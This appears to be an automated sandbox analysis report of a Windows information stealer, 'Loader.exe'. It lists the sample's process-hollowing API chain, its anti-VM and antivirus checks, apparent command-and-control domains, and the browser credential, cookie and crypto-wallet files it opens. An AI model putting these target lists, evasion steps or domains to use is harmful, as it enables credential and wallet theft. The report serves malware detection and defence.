              Source: Loader.exe, 00000003.00000003.1760893361.0000000005936000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1714336106.0000000005966000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760947199.0000000005944000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760930827.000000000593F000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1760913077.000000000593B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0092FC73 push ecx; ret 0_2_0092FC86
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0092FC73 push ecx; ret 2_2_0092FC86
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00440240 push eax; mov dword ptr [esp], DED9D88Bh3_2_00440245
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004464FA push edx; ret 3_2_00446500
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0044666E push cs; ret 3_2_00446682
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00446627 push cs; ret 3_2_00446682
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00430797 push 89240489h; mov dword ptr [esp], eax3_2_004307CB
              Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21165
              Source: C:\Users\user\Desktop\Loader.exe TID: 7432Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_009420D9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009420D9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00942028 FindFirstFileExW,0_2_00942028
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_009420D9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_009420D9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00942028 FindFirstFileExW,2_2_00942028
              Source: Loader.exe, 00000003.00000003.1902857262.000000000336C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1903575535.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.1904716370.0000000003370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: Loader.exe, 00000003.00000002.1904716370.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1903575535.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1902857262.00000000033B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043EBA0 LdrInitializeThunk,3_2_0043EBA0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0092F9D9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092F9D9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00922060 mov edi, dword ptr fs:[00000030h]0_2_00922060
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0095A19E mov edi, dword ptr fs:[00000030h]0_2_0095A19E
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00922060 mov edi, dword ptr fs:[00000030h]2_2_00922060
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0093D9D0 GetProcessHeap,0_2_0093D9D0
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0092F61D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0092F61D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0092F9D9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092F9D9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0092F9CD SetUnhandledExceptionFilter,0_2_0092F9CD
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00937F20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00937F20
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0092F61D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0092F61D
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0092F9D9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0092F9D9
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0092F9CD SetUnhandledExceptionFilter,2_2_0092F9CD
              Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00937F20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00937F20

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0095A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0095A19E
              Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
              Source: Loader.exe, 00000000.00000002.1668107611.0000000003343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: undesirabkel.click
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_0093D2AD
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00941377
              Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_009415C8
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00941670
              Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_009418C3
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00941930
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00941AF7
              Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00941A05
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00941A50
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00941BFD
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_0093CD05
              Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_0093D2AD
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00941377
              Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_009415C8
              Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_009418C3
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_00941930
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00941AF7
              Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_00941A05
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_00941A50
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_00941BFD
              Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_0093CD05
              Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_009301A4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_009301A4
              Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Loader.exe, 00000003.00000003.1903481642.0000000003416000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.1905041050.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1902629994.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1882184319.0000000003411000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1881885413.000000000340F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1853019894.000000000340C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1882356018.0000000003416000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
              Source: Loader.exe, 00000003.00000003.1835467428.0000000005939000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1835512355.000000000593F000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.1835602520.0000000003416000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7408, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Loader.exe, 00000003.00000003.1835653632.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: Loader.exe, 00000003.00000003.1835653632.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: Loader.exe, 00000003.00000003.1835653632.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: Loader.exe, 00000003.00000003.1809991841.0000000003402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: Loader.exe, 00000003.00000003.1902857262.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: [{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\
              Source: Loader.exe, 00000003.00000003.1835653632.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb30
              Source: Loader.exe, 00000003.00000003.1835653632.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: Loader.exe, 00000003.00000003.1809991841.0000000003402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Loader.exe, 00000003.00000003.1809991841.0000000003402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
